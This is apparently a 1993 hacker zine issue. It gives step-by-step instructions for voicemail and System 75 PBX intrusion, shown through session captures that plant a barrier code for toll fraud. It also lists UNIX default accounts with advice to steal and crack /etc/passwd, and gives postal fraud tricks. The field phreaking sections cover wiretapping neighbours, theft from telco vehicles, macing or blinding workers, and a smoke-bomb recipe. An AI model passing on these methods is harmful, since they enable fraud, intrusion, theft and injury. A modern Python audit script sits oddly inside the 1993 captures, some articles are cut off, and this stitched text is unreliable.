Communications of The New Order
Issue #1
Summer, 1993

"The best things in life are toll-free." AT&T

Editor......................................DeadKat
Cheerleader.................................Karb0n
Rebel without a pause.......................Panther Modern
Fund raiser.................................Cavalier
The K-radiest...............................Jewish Lightning
Flatline engineer...........................Nuklear Phusion

Thanks to: Phreddy!, god, Control-C (the new one), Nitro-187, RDT (you guys rule), VirtualCon (NOT!), Lucifer and the Coders, Disk Jockey, Visionary, Kamikaze, John Falcon, Cosmos, Pee Wee, and all the negligent system administrators of the world...

=========

___/\/INTRoDUCTIoN\/\___

Welcome to CoTNo! This publication is the prodigy of The New Order, Colorado's best hacking group. We have created this 'zine to help teach what we have learned and discovered from our combined years of experience. This is not intended to be an ultra-technical collection of barely useful information, but rather a forum for spreading current H/P/A knowledge and practices to the newer members of the 'scene'. You will not find mind-numbing overly technical reports here. Nor will you be wasting your time and hard-drive by downloading useless articles on non-H/P/A topics like gambling and car theft. All articles contained in CoTNo have useful applications in today's heavily computerized and automated society.
Some well experienced hackers may find these texts to be old hat, but we feel the scene has been dying because of a lack of basic hacking tutorials. The goal of the writers of this publication and the members of TNo is to educate and enlighten in order to recreate the booming scene of the 80's.

The New Order (TNo) are the main writers and supporters of this 'zine. We are composed of hackers, phreakers, and "hairy-eyed anarchists" from the Colorado area. We recently received some minor publicity in a comment found in The Seed Magazine: Denver's Rag of Underground Culture. The following is an excerpt from the June/July '93 issue:

"Hackers - no longer a small underground phenomenon, these computer whiz-kids have become a highly organized network of post-modern renegades. With everything in our lives being computerised, today's hackers are able to gain unbelievable access into just about everything. They communicate to each other via BBS (Bulletin Board System) and trade tips on everything from music to ripping off the phone company. The buzz around town is about Flatline, a BBS run by the hacking crew, TNO."

Not exactly the front page of Time, but at least this was a POSITIVE statement by the media on the hacking phenomenon.

We accept submissions to CoTNo from anyone who has willingness to teach and can get on Flatline. There will also be a CoTNo mailing address soon. This mag' will be published on a quarterly basis.

DISCLAIMER
~~~~~~~~~~
This publication contains information pertaining to illegal acts. The use of this information is intended solely for evil purposes. The editors, writers, and publishers of this publication take no responsibility for any legal acts committed using this information. If you plan on using this information for destructive purposes, read on. Otherwise...FUCK OFF!

TABLE OF CONTENTS
~~~~~~~~~~~~~~~~~
 1. CoTNo Introduction.......................................DeadKat
 2. How to Hack Audix VMB's..................................DeadKat
 3. System 75 Hacking (An Online Tutorial)...................Panther Modern
 4. UNiX Default List........................................TNO Hacking Crew
 5. HoW To MAiL FoR FREE.....................................Karb0n
 6. How to Red Box...........................................DeadKat
 7. Field Phreaking I........................................The Third Cartel
 8. Field Phreaking II.......................................The Third Cartel
 9. How to Make a ZAPPER GUN.................................Panther Modern
10. Comments on Phrack 42....................................Karb0n
11. CoTNo Conclusion.........................................DeadKat

=========

(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)
HOW TO HACK AUDIX VMB'S
By |>ead

| Occasionally 1111 /

Once you figure out the default password for one empty box, you can access all the boxes you found during your scan by using the default.

WHAT TO DO ONCE YOU'RE IN
-------------------------
You will know when you have broken into a box when you hear a message like "Extension XXX, you have no new messages." You can now set up your personal box. The following is a list of the functions available to you:

KEY    FUNCTION
---    --------
1      Create a message.
2      Retrieve messages left for you.
3      Change your greeting.
4      Check out messages left by you.
5      Change password.
6      Change call notification information.
**R    Relog into your box.
**N    Enter the directory.

The first thing you should do is change your password! You don't want anybody to hack YOUR box.

ADVANCED AUDIX
--------------
Sometimes you will find boxes that have no name, but don't have a default. Transfer to the box and check it out. It might be a carrier. Audix's are usually found on System 75/85 PBX's which can be accessed via modem. Call it with your modem and if you get a prompt that looks like Logon: you have scored big. A tutorial on hacking System 75/85's can be found elsewhere in this 'zine.
If you transfer to the box and you hear a quick beep without hearing any type of greeting, you have found a bridge. Have a friend call the system and transfer to the same box after you have and see if you can talk to each other. All System 75/85's have the capability to bridge extensions but this option is rarely used. If you find a bridge, only call it late at night so you don't stumble into a valid conference.

CONCLUSION
----------
You should be a master at hacking Audix VMB's now. You can use many similar techniques on other brands of VMB's too. Be conservative with your boxes. The more boxes you snag from one company, the more likely they will notice you and shut you out. If you do end up with 500 boxes, use them to trade with. You can get better access on boards, money, or equipment for them. Have Phun!
__________________________________________________________________________
(C)opywrong 1993, DeadKat Inc. All wrongs denied.

=========

/\/System 75 hacking\/\
/\/An online tutorial\/\

-=Captured from a very generous company located in Denver=-
-=My thanks go out to them for use of their PBX=-

--Intro by Panther Modern TNO/TBF--
--Hacking of the system by Panther Modern TNO/TBF--
--Editing and revising from |>ead|Special thanks to Dead Kat for teaching me how to do this stuff..<

INTRO
~~~~~
System 75/85's..The gateway to the world of the PBX...If one can hack these machines, one has the ability to generate many codes for himself, and his fellow phreakers/hackers to use and enjoy. Hacking these machines can be very fun, but if one does not know what he's doing, it could be frustrating and potentially risky. That's why I am writing this text.

This file includes captures from two hacks I did. In the first hack, I will show you how I went thru, saw that the company did not have a PBX, and made my own for my own personal gateway to free LD. In the second hack you will see how I simply looked, saw the PBX, and quickly found the correct trunk, changing nothing.
Version 2 is definitely the better way to hack a system. If you change things, it will show up on the system log. Along comes a system administrator to read the log, and yer busted. But if you don't change anything, no one will ever know you were there...Of course, many times, it becomes necessary to change things, if the company doesn't already have a PBX installed...You must make your own.

For ease of reading, I have gone thru and edited/commented on everything I did in both hacks. Hopefully I made it easy to understand..Good luck hacking System 75!

CONVENTIONS USED IN THIS ARTICLE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. The command prompt is enter command:
2. Resulting screens begin and end with dashes.
3. Comments are enclosed by brackets. [ ]
4. Emulation is Bell 513.

THE FIRST HACK
~~~~~~~~~~~~~~
CARRIER 1200
[1200 baud is a good way to recognise a sys75]

KEYBOARD LOCKED, WAIT FOR LOGIN

Login: XXXXX
Password: XXXXXXX
[I don't want to include any passwords in this file]

Terminal Type (513, 4410, 4425): [513]
[513 is a default bell prefix. It is about the same as VT100]
____________________________________________________________________________

                          Copyright (c) 1986 - AT&T
                     Unpublished & Not for Publication
                            All Rights Reserved
____________________________________________________________________________
[I like this screen...]

enter command: display rem<<
[All you really need is DIS, not display. Try DIS HELP, also, LIST HELP]
____________________________________________________________________________
display remote-access                                          Page 1 of 1

                               REMOTE ACCESS

 Remote Access Extension:              Barrier Code Length: 4

 BARRIER CODE ASSIGNMENTS (Enter up to 10)
     Barrier Code   COR         Barrier Code   COR
  1:                 1       6:                 1
  2:                 1       7:                 1
  3:                 1       8:                 1
  4:                 1       9:                 1
  5:                 1      10:                 1
____________________________________________________________________________
[As you can see, no remote access ports are set up. No PBX, and no codes. Code length is four digits.]
enter command: dis trunk 1
[we will now look at all 99 trunks, to find the rite one to use..]
____________________________________________________________________________
display trunk-group 1                                          Page 1 of 5

                               TRUNK GROUP

 Group Number: 1          Group Type: co          SMDR Reports? y
   Group Name: main pool         COR: 1                   TAC: 76
    Direction: two-way   Outgoing Display? n
 Data Restriction? n
 Dial Access? y       Busy Threshold: 60        Night Service:
 Queue Length: 0      Incoming Destination: 200
    Comm Type: voice
 Digit Absorption List:
 Prefix-1? n             Restriction: toll   Allowed Calls List? n

 TRUNK PARAMETERS
   Trunk Type: loop-start
 Outgoing Dial Type: tone          Trunk Termination: rc
 Disconnect Timing(msec): 500
 ACA Assignment? n                 Maintenance Tests? y
 Answer Supervision Timeout:
 Suppress # Outpulsing? n
____________________________________________________________________________
[First we look at night service, and incoming destination, recording the numbers to hardcopy. We also note the trunk type, and COR number]
[We type [U to get to the next page of text.]
____________________________________________________________________________
display trunk-group 1                                          Page 2 of 5

                               TRUNK GROUP

 GROUP MEMBER ASSIGNMENTS
      Port    Name       Mode   Type   Answer Delay
  1:  A0301   xxxxxxx
  2:  A0302   xxxxxxx
  3:  A0303   xxxxxxx
  4:  A0304   xxxxxxx
  5:  A0305   xxxxxxx
  6:  A0306   xxxxxxx
  7:  A0307   xxxxxxx
  8:  A0308   xxxxxxx
  9:  A0401   xxxxxxx
 10:  A0402   xxxxxxx
 11:  A0403   xxxxxxx
 12:  A0404   xxxxxxx
 13:  A0405   xxxxxxx
 14:  A0406   xxxxxxx
 15:  A0407   xxxxxxx
____________________________________________________________________________
[Where name is, there will be fone numbers. Record these so you will know what number to dial in to while hacking. I have removed the numbers for security reasons.]
[Same process was done on the remaining trunks. Always scan all 99, even if you stop finding some. There may be a good one...]
[If the trunk has both a night extension and a phone number listed on page 2, make a note of it. Use the command dis cor to see the trunk's restrictions.
FRL should equal 7. If not, change it to 7 or find another trunk.]
[BTW - When done looking thru pages, type Ow to return to prompt]
[What we found was a trunk which looked as if it was fairly unimportant. Also, it didn't have a night extension. This is important, because we want to set up an after-hours PBX. If we take over a daytime extension, the PBX would most likely go down within 24 hours.]
[If, under the name column, there are strange numbers, like AT204, just disregard them, and go on to the next trunk, these are internal extension numbers.]

enter command: dis dial<<
[This displays the dial plan for the system. It will show you which digit to start your remote extension (shown later) with. Use a digit that says EXTENSION. As you can see, that digit here is 2.]
____________________________________________________________________________
display dialplan                                               Page 1 of 1

                             DIAL PLAN RECORD

 Area Code: XXX
 ARS Prefix 1 Required? y
 Uniform Dialing Plan? n

 FIRST DIGIT TABLE
 Digit  Identification  Number of      Digit  Identification  Number of
                        Digits                                Digits
  1:    fac             3               7:    tac             2
  2:    extension       3               8:    tac             1
  3:                    0               9:    fac             1
  4:                    0               0:    attendant       1
  5:                    0               *:    fac             2
  6:    tac             2               #:    fac             2
____________________________________________________________________________

enter command: dis allow
[This will display the allowed calls/area codes. If your PBX does not work later on, check here, and try to add the correct area code you want to call]
____________________________________________________________________________
display allowed-calls                                          Page 1 of 1

                 ALLOWED CALLS LIST (FOR TOLL RESTRICTION)

 AREA/LONG DISTANCE CARRIER CODES ( Enter up to 10 )
  1: 800       6:
  2: 911       7:
  3: 950       8:
  4:           9:
  5:          10:
____________________________________________________________________________
[This system can call 800's, 950's, 911, as well as long distance numbers.]
enter command: list help
____________________________________________________________________________
Please enter one of the following object command words:

 abbreviated-dialing    groups-of-extension    personal-CO-line
 aca-parameters         hunt-group             pickup-group
 bridged-extensions     intercom-group         station
 configuration          measurements           term-ext-group
 coverage               modem-pool             trunk-group
 data-module            performance

Or press CANCEL to cancel the command

Object command word omitted; please press HELP
____________________________________________________________________________
[List is similar to DIS, except that none of its factors can be changed.]

enter command: list groups-of-extension 200
[We are attempting to find an empty extension to set up the remote on. Find an extension that is not being used and write it down. The screens have been omitted for brevity's sake.]
[We will now set up a remote extension.]

enter command: list group 299<
list groups-of-extension 299
Extension not assigned
[We first found an empty extension]

enter command: ch rem<
[we proceeded to add it to the remote access. I will put {'s around what we added.]
____________________________________________________________________________
change remote-access                                           Page 1 of 1

                               REMOTE ACCESS

 Remote Access Extension: {299}        Barrier Code Length: 4

 BARRIER CODE ASSIGNMENTS (Enter up to 10)
     Barrier Code   COR         Barrier Code   COR
  1: {3323}          1       6:                 1
  2:                 1       7:                 1
  3:                 1       8:                 1
  4:                 1       9:                 1
  5:                 1      10:                 1

Command successfully completed
____________________________________________________________________________
[We added in our code, and our remote access extension, and then save by typing SB ]
[We added our extension, and our code (barrier code)]

enter command: dis trunk 9<<
[We looked back on our hardcopy notes, and decided that trunk 9 would be appropriate to add our code to.
We re-display just to make sure]
____________________________________________________________________________
display trunk-group 9                                          Page 1 of 5

                               TRUNK GROUP

 Group Number: 9          Group Type: co          SMDR Reports? y
   Group Name: fax wild line     COR: 1                   TAC: 79
    Direction: two-way   Outgoing Display? n
 Data Restriction? n
 Dial Access? y       Busy Threshold: 60        Night Service:
 Queue Length: 0      Incoming Destination: 267
    Comm Type: voice
 Digit Absorption List:
 Prefix-1? n             Restriction: code

 TRUNK PARAMETERS
   Trunk Type: loop-start
 Outgoing Dial Type: tone          Trunk Termination: rc
 Disconnect Timing(msec): 500
 ACA Assignment? n                 Maintenance Tests? y
 Answer Supervision Timeout:
 Suppress # Outpulsing? <
display trunk-group 9
Command aborted
____________________________________________________________________________

enter command: ch trunk 9
[Once again, changes I made will be in {'s]
____________________________________________________________________________
change trunk-group 9                                           Page 1 of 5

                               TRUNK GROUP

 Group Number: 9          Group Type: co          SMDR Reports? y
   Group Name: fax wild line     COR: 1                   TAC: 79
    Direction: two-way   Outgoing Display? n
 Data Restriction? n
 Dial Access? y       Busy Threshold: 60        Night Service: {299}
 Queue Length: 0      Incoming Destination: 267
    Comm Type: voice
 Digit Absorption List:
 Prefix-1? n             Restriction: code

 TRUNK PARAMETERS
   Trunk Type: loop-start
 Outgoing Dial Type: tone          Trunk Termination: rc
 Disconnect Timing(msec): 500
 ACA Assignment? n                 Maintenance Tests? y
 Answer Supervision Timeout:
 Suppress # Outpulsing? n

Command successfully completed
____________________________________________________________________________
[All we had to do was add our remote extension to Night Service]
[..And save it with SB ]
[You should now have a ready-to-use PBX!!!!!! Check page 2, that's yer after hours dial in number.]
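Seen from the administrator's side, the two edits in this first capture (a Remote Access Extension with a barrier code, and a trunk group's Night Service pointed at it) are what a configuration review should catch. The Python below is an added example, not part of the original article: it compares a saved baseline of the display remote-access and display trunk-group screens with a current capture, and also lists trunks that expose remote access with no change at all. The screen layouts are constructed from the values shown above, and every function name is hypothetical.

```python
import re

# Constructed screens: laid out like the display remote-access and
# display trunk-group output in the capture above, using its values.
REMOTE_BEFORE = """\
display remote-access                                   Page 1 of 1
                           REMOTE ACCESS
 Remote Access Extension:          Barrier Code Length: 4
 BARRIER CODE ASSIGNMENTS (Enter up to 10)
     Barrier Code   COR        Barrier Code   COR
  1:                 1      6:                 1
  2:                 1      7:                 1
"""
REMOTE_AFTER = """\
display remote-access                                   Page 1 of 1
                           REMOTE ACCESS
 Remote Access Extension: 299      Barrier Code Length: 4
 BARRIER CODE ASSIGNMENTS (Enter up to 10)
     Barrier Code   COR        Barrier Code   COR
  1: 3323            1      6:                 1
  2:                 1      7:                 1
"""
TRUNK9_BEFORE = """\
display trunk-group 9                                   Page 1 of 5
 Group Number: 9        Group Type: co       SMDR Reports? y
 Dial Access? y     Busy Threshold: 60     Night Service:
 Queue Length: 0    Incoming Destination: 267
"""
TRUNK9_AFTER = TRUNK9_BEFORE.replace("Night Service:", "Night Service: 299")


def _field(label, screen):
    """Digits that follow 'label:' on the same line, or None if blank."""
    m = re.search(re.escape(label) + r":[ \t]*(\d+)?", screen)
    if m is None:
        raise ValueError(f"field {label!r} not found")
    return m.group(1)


def parse_remote_access(screen):
    """Extract the remote access extension and the assigned barrier codes."""
    length = int(_field("Barrier Code Length", screen))
    codes = {}
    table = screen.split("BARRIER CODE ASSIGNMENTS", 1)[1]
    for line in table.splitlines():
        # parts = [prefix, slot, columns, slot, columns, ...]
        parts = re.split(r"\b(\d{1,2}):", line)
        for slot, columns in zip(parts[1::2], parts[2::2]):
            tokens = columns.split()
            # Assumption: COR/COS values are shorter than a barrier code,
            # so a leading token of exactly `length` digits is the code.
            if len(tokens) >= 2 and tokens[0].isdigit() and len(tokens[0]) == length:
                codes[int(slot)] = tokens[0]
    return {"extension": _field("Remote Access Extension", screen), "codes": codes}


def parse_trunk_group(screen):
    """Extract the group number and Night Service destination."""
    return {"group": int(_field("Group Number", screen)),
            "night_service": _field("Night Service", screen)}


def exposed_trunks(remote, trunks):
    """Trunk groups whose Night Service is the remote access extension."""
    ext = remote["extension"]
    if ext is None:
        return []
    return sorted(t["group"] for t in trunks if t["night_service"] == ext)


def audit(base_remote, cur_remote, base_trunks, cur_trunks):
    """Compare baseline and current configuration; return finding strings."""
    findings = []
    if cur_remote["extension"] != base_remote["extension"]:
        findings.append("remote access extension changed: "
                        f"{base_remote['extension']} -> {cur_remote['extension']}")
    slots = set(base_remote["codes"]) | set(cur_remote["codes"])
    for slot in sorted(slots):
        if base_remote["codes"].get(slot) != cur_remote["codes"].get(slot):
            findings.append(f"barrier code slot {slot} changed")
    old_night = {t["group"]: t["night_service"] for t in base_trunks}
    exposed = exposed_trunks(cur_remote, cur_trunks)
    for trunk in cur_trunks:
        old, new = old_night.get(trunk["group"]), trunk["night_service"]
        if new != old:
            note = f"trunk group {trunk['group']} night service changed: {old} -> {new}"
            if trunk["group"] in exposed:
                note += " (routes after-hours calls to remote access)"
            findings.append(note)
    return findings


if __name__ == "__main__":
    for finding in audit(parse_remote_access(REMOTE_BEFORE),
                         parse_remote_access(REMOTE_AFTER),
                         [parse_trunk_group(TRUNK9_BEFORE)],
                         [parse_trunk_group(TRUNK9_AFTER)]):
        print(finding)
```

A diff against a baseline only catches edits; `exposed_trunks` run on its own reports remote access that was already reachable before anyone touched the configuration.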
enter command: dis trunk 9
[We check again to make sure our changes came thru correctly]
____________________________________________________________________________
display trunk-group 9                                          Page 1 of 5

                               TRUNK GROUP

 Group Number: 9          Group Type: co          SMDR Reports? y
   Group Name: fax wild line     COR: 1                   TAC: 79
    Direction: two-way   Outgoing Display? n
 Data Restriction? n
 Dial Access? y       Busy Threshold: 60        Night Service: 299
 Queue Length: 0      Incoming Destination: 267
    Comm Type: voice
 Digit Absorption List:
 Prefix-1? n             Restriction: code

 TRUNK PARAMETERS
   Trunk Type: loop-start
 Outgoing Dial Type: tone          Trunk Termination: rc
 Disconnect Timing(msec): 500
 ACA Assignment? n                 Maintenance Tests? y
 Answer Supervision Timeout:
 Suppress # Outpulsing? <
display trunk-group 9
Command aborted
____________________________________________________________________________
[everything's great!]

enter command: logoff
[Sooooooooo.....We logoff...]
[To use yer PBX, just dial in, and type: +9+1+ACN!! Or to set up an alliance, replace the 1 with a 0...]

THE SECOND HACK
~~~~~~~~~~~~~~~
[I started this capture a little late, after I had already looked through a few things. It still gets the point across, tho. It displays going thru, and not changing ANYTHING!]

enter command: dis rem
[I look at the remote...]
____________________________________________________________________________
display remote-access                                          Page 1 of 1

                               REMOTE ACCESS

 Remote Access Extension: 599          Barrier Code Length: 5
 Authorization Code Required? n

 BARRIER CODE ASSIGNMENTS (Enter up to 10)
     Barrier Code   COR  COS        Barrier Code   COR  COS
  1: 52290           1    1      6:                 1    1
  2: 11111           1    1      7:                 1    1
  3:                 1    1      8:                 1    1
  4:                 1    1      9:                 1    1
  5:                 1    1     10:                 1    1
____________________________________________________________________________
[I see that there are 2 codes and an extension already set up.
I am wary of code number 2..It could be a trap code]

enter command: dis trunk 7
____________________________________________________________________________
display trunk-group 7                                          Page 1 of 9

                               TRUNK GROUP

 Group Number: 7          Group Type: co          SMDR Reports? y
   Group Name: REMOTE ACCESS     COR: 63                  TAC: 707
    Direction: two-way   Outgoing Display? n
 Dial Access? y       Busy Threshold: 10        Night Service: 599
 Queue Length: 0      Incoming Destination: 0
    Comm Type: voice          Auth Code? n
 Digit Absorption List:
 Prefix-1? n             Restriction: code        Trunk Flash? n

 TRUNK PARAMETERS
   Trunk Type: ground-start
 Outgoing Dial Type: tone          Trunk Termination: rc
 Disconnect Timing(msec): 500
 Terminal Balanced? n              RA Trunk Loss: 0db
 Answer Supervision Timeout: 10
 Receive Answer Supervision? <
display trunk-group 7
Command aborted
____________________________________________________________________________
[I see that trunk 7 already has the extension ready to use!!!!!!!!]
[FREE LD and no changes! They will not know I was ever there!!!]
[I look at pages 2 and 3 for the fone numbers to dial in to, and then I'm OUTTA THERE!!!]

enter command: logoff

--I hope these captures helped..
--Panther Modern TNO/TBF

=========

/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\
*|   The TNO Hacking Crew Presents   |*
*|                                   |*
*|           UNiX Defaults           |*
\~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/

INTRO
~~~~~
This is a list compiled by the members of The New Order from frequent visits to UNiX hosts. These are default accounts/passwords observed in hosts running UNiX variations including System V, BSD, Xenix, and AiX. These defaults are included in standard setup on various machines so the Sysadmin can log on for the first time. Often the negligent Sysadmin forgets to delete or password the accounts. This makes UNiX machines extremely easy to infiltrate.

This article does not go into specifics of hacking but it is highly suggested that you immediately copy the /etc/passwd file (/etc/security/passwd in AiX machines!)
so you can later run a dictionary hacker and get some other accounts and ensure your access.

This is a list of default accounts which are often unpassworded. If the system asks for a password, try the account name which sometimes works.

DEFAULTS
~~~~~~~~
root        bin         adm         makefsys    sysadm
sys         mountfsys   rje         sync        umountfsys
tty         nobody      checkfsys   somebody    setup
lp          powerdown   ingres      dptp        general
guest       daemon      gsa         user        trouble
games       help        nuucp       public      unix
uucp        test        admin       student     standard
pub         field       demo        batch       visitor
listen      network     uuhelp      usenet      sysinfo
cron        console     sysbin      who         root2
startup     shutdown    ncrm        new

CONCLUSION
~~~~~~~~~~
Have phun but be careful! Learn what to do before you run out and invade some systems. These won't do you any good if you can't hide your tracks. Hacking is all about learning about cool stuff, but you can't hack until you learn how. Njoy.

=========

HoW To MAiL FoR FREE
BY KARB0N -=TNO=-

Postal chiselers used to mail letters unstamped in the knowledge that they would be delivered anyway... with "Postage Due" to the recipient. It took a stingy person to mail personal letters this way, but many people did send mail this way on bill payments.

So the Post Office changed its policy. It stopped delivering letters without stamps. But a letter with a stamp.. even a one cent stamp...is delivered postage due if need be. A letter with no stamp is returned to the sender.

Naturally, this has just opened up a new way of cheating. Letters can now be mailed for free by switching the positions of the delivery address and the return address. If there is no stamp on the envelope, it will be returned to the address in the upper left corner.. which is where you want it to go in the first place. Unlike the old system, the letter is not postage-due. At most the recipient gets a stamped purple reminder that "The Post Office does not deliver mail without postage."

At least one large company seems to have adapted this principle to its billing.
Citibank bases its MasterCard operations in Sioux Falls, South Dakota. The bill payment envelopes have the Citibank Sioux Falls address in both the delivery address and return address positions. (Most bill payment envelopes have three lines for the customer to write in his or her return address.) Therefore, regardless of whether the customer puts a stamp on the envelope, it is delivered to Citibank. (The return-address gimmick works even when the return address is in a different state from the mailing point.)

Who is cheating whom? If the customer puts correct postage on the envelope, it is delivered to Sioux Falls at the customer's expense. No one is slighted. If, on the other hand, the customer intentionally omits the stamp, the payment is delivered at Post Office expense. Then the customer has cheated the Post Office. The Post Office also loses out if the customer honestly forgets to put a stamp on the envelope. But then blame ought to be shared with the peculiar design of Citibank's envelope. Citibank's motive is plain: If the envelopes are returned to forgetful customers, it delays payment.

=========

(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)
|>ead|

=========

(Editor's note: The following two files are the best files I have ever read on field phreaking. They were written by Denver hackers a few years ago. Since they were not widely distributed I have included them here for your information. Unfortunately we were not able to contact the original authors to get permission to reprint them. As far as we know, The Third Cartel is defunct. If any previous members of the group read this publication, we ask that they get in contact with us at Flatline.)

-/\-/*\-/\-/*\-/\-
 The Third Cartel
-\/-\*/-\/-\*/-\/-
    Presents:
Field Phreaking I
-=-=-=-=-=-=-=-=-=-
    June, 1988

Introduction: The purpose of this manuscript is to introduce useful phreaking techniques.
These techniques have been developed by the Third Cartel and have proved to be convenient and reliable.

Field Phreaking Kit:
====================
The Field Phreaking Kit is a necessity for the serious phreaker. Some so-called phreaks get all of their information including codes from BBSs and have an ego big enough to call themselves phreaks. The real phreak acquires knowledge on his own through perseverance and ingenuity. Following is a list of useful items for your Phreaking Kit:

o Backpack: Get one: Very Handy. We'll tell you how to get one or make one.
o Ratchet Set: Usually, you'll only need 7/16 and 3/8" size ratchets.
o Screwdrivers: Get medium and large screwdrivers, and a phillips head.
o Wire Cutters: Just in case you want to wipe out some lines.
o Pliers: For misc. stuff.
o Xacto or Pocket Knife: To strip or cut wires.
o Penlight: Nice and small; very useful for night work.
o Flashlight: If you need lots of light and have enough room in your pack.
o Gloves: Make sure you don't get shocked or leave your fingerprints around.
o Pencil and Paper: Write down locations, notes, numbers, etc.

------------------------------------------------------------------------------
The Third Cartel carries the following optional materials in their Field Kit:
------------------------------------------------------------------------------
o Walkie-Talkies: For communications when yelling isn't possible or smart.
o Battery Operated Camera Flash: Good for flashing in someone's eyes at night. Will blind a telco guy for a few seconds.
o Mace/Dog Repellant: Spray in someone's eyes if they give you trouble.
o Smoke Bomb: Helpful to divert attention or scare. [drop in telco car] [Mix 3 parts potassium nitrate with 2 parts sugar and melt]
o Matches: For smoke bomb or anything that is flammable.
o Bandana/Surgical Mask: Manholes are dusty; Wear these for easier breathing.
o Marker: Mark your "territory" on phone boxes.
o Fake Telco ID Card: Will make some people think that you work for telco.

Organize your kit so you know where everything is and can get something quickly when needed. You don't want to be fumbling for your mace when the gestapo is about to get you.

Test Phone:
===========
The Test Phone is the most useful piece of equipment for Field Phreaking. You can try to sneak into a telco Plant Department [truckyard] and get a real test phone out of a truck like we did. If you'd rather not do this, don't worry; making your own test phone is ultra-easy.

First, get a telephone for your own purposes. Find the wire coming out of the phone that is supposed to go to the wall's modular jack. It should be at least three feet long for convenience. Cut off the modular jack at the end of the wire. Strip the wire, and there should be two or four small wires inside. Hook the two middle wires to alligator clips [preferably insulated]. You now have a test phone! Very easy, indeed.

Now let's see if you hooked everything up ok. First find your phone box. It'll probably be on the outside of your house. It's fairly small, and you might need the ratchet to open it up. Once you get it open, you should see some screws. These are the terminals for your phone line. Hook the alligator clips to the two top terminals. If your phone is ok, you should get a dial tone.

Once you know that your phone is working, a whole new world opens up to you! You can hook the phone up to your neighbor's terminal and call long distance or yell at the operator on their line. Be careful, though. You don't want to be talking to Sue in L.A. when your neighbors are home and awake. If they pick up the phone when you're already on, you could get into serious trouble. Of course, you could always listen in on them!

If you want, you can hook wires up to your neighbor's terminal and lead them to your house. In case you didn't know, this is called Beige Boxing. You can then hack computers on their line, call Dial-A-Prayer, etc.
Make sure to hide the wire well so that it won't be traced to your house!

Manholes:
=========
One way to get access to an abundance of phone lines is by getting into telco manholes. You don't want to accidentally get in a sewer manhole, so the first thing to do is find the differences between sewer and telephone manholes. If you have trouble with this, here's a few tips that might help:

o Telco manhole covers are usually larger and heavier than other covers.
o Telco manholes are scarce compared to sewer manholes. So if there are a lot of checkered manhole covers in your area, those are probably sewer manholes. If there are only a handful of unmarked manhole covers in your area, those probably contain phone lines.
o Go to your local telco Central Office [CO] and find out what the manhole covers look like there. Find manhole covers that look the same in other areas, and pick a convenient/safe manhole to explore.

Getting into a manhole is a different story. Here in the Denver area, it takes at least three people to get a manhole cover off. Hopefully it'll be easier to do in your area. To open the manhole, you'll probably need at least two crowbars [You could try using a pickaxe]. Get a group together to open the manhole, using 2 or more people with crowbars to slide the cover off. You might want to get a strong guy to push the manhole cover while the other people with crowbars support it.

If you know of a tool that was made specifically for opening manholes, we'd appreciate it if you contacted us on some local Denver boards and told us about it. Likewise, if you have a better system for opening manholes, we'd be grateful for the information.

Once you get the manhole cover off, shine a flashlight down to see if there's a ladder going to the bottom. Try a different manhole if there's no ladder. If you want to go down a manhole, don't forget to wear a bandana or surgical mask over your mouth so that you don't choke on dust.
Also bring a flashlight so you can see what you're doing. Many times, there'll be a few inches of water at the bottom, so you might also want to wear boots.

Down in the manhole, you might find some equipment or manuals. Go ahead and take them if you want; you deserve it! There should be some very large ABS. The phone lines are inside these tubes. Attached to this tubing there will be some short, wide plastic cylinders. There'll be screws holding these cylinders on to the tubing. You'll need either a screwdriver or a ratchet to open a cylinder. If you happen to get a cylinder open, congratulations! You now have access to countless phone lines! We'll leave it to you to figure out what to do with all of those wires. Surely you'll figure something out! [snip, snip!]

Exploring Telco Building Sites:
===============================
One of the best ways to get information about telco is by going to a Central Office near you, exploring the trucks in a Plant Department, or "visiting" other telco buildings. The phone company is careless in many ways. They leave important, yet unshredded documents and computer printouts in their open dumpsters. Their cars, vans, and repair vehicles are almost always left unlocked. Inside their vehicles one can usually find manuals, test phones, computer cards [usually for mainframes, almost never for personal computers], nice tool sets, etc.! It's almost as if they *want* to be ripped off! They deserve bad treatment just for their negligence.

If possible, we like to be courteous to individual employees of telco. Most employees are fairly amiable and don't deserve trouble. It's the bureaucracy of telco that deserves to be manhandled. Cheap practices such as monopolizing and the overpricing of services is the general reason why we phreaks do what we do with such determination. On with the show.

Exploring Dumpsters: Looking inside telco dumpsters is probably the easiest way to acquire useful information.
Typically, dumpsters will be found outside a Central Office.

-/\-/*\-/\-/*\-/\-
 The Third Cartel
-\/-\*/-\/-\*/-\/-

Presents:

Field Phreaking II
-=-=-=-=-=-=-=-=-=-
July, 1988

Introduction: The purpose of this manuscript techniques have been developed by the Third Cartel and have proved to be convenient and reliable. This manuscript is a continuation of Manuscript II: Field Phreaking.

Pay Phone Hacking:
==================

The safest way to get phreaking codes is by hacking them on a pay phone. The chances of getting caught are extremely remote, especially if you switch pay phones every few minutes. One problem with hacking codes is that when you find a code by dialing it randomly, you often forget what code you dialed. To prevent this, we print out a sheet filled with 6-8 digit random codes on the computer. Then we start testing each of these codes off of a 950 number. This works great, especially since 950s are not charged! Cross off each code on the paper that doesn't work, and mark the ones that do work. This technique takes a lot of patience, but it's worth it if you have a terrible short-term memory.

Telco Boxes:
============

This is our prime focus in Manuscript III. Every field phreaker worth his weight in dung should at least know the basics about phone boxes. There are so many different types that we can only cover the major groups. But once you learn about a few boxes, it'll be easy to learn about others. Be sure to bring a test phone with you [see Manuscript II] so you can connect up to phone lines.

Small Boxes:
------------
Small telephone boxes typically contain 1 to 20 different phone lines. They are usually in convenient and safe locations. They are easy to open, and can be closed quickly.

Home Boxes: Unless you live in an apartment complex, your home box should be very easy to locate. It is a small box located on the side of your house; usually a foot or two off the ground.
Many times it will be beige colored and may require a ratchet [Usually 3/8"] to open. If you have more than one line in your house, your box will probably be fairly large and light gray. You'll need a ratchet and a screwdriver to open a two-line box. In the one-line box there will be five terminals or screws. The top two screws should have red and green wires leading to them. If you connect your test phone clips to these screws, you'll be on the line. Usually, the two screws below contain the same phone line. The very bottom screw, in the middle, is the ground. In the two-line boxes, you should be able to figure out how to hook up to the lines rather easily. They even have a modular plug jack that you can plug a normal phone into. There are also several terminals that you can hook the clips up to.

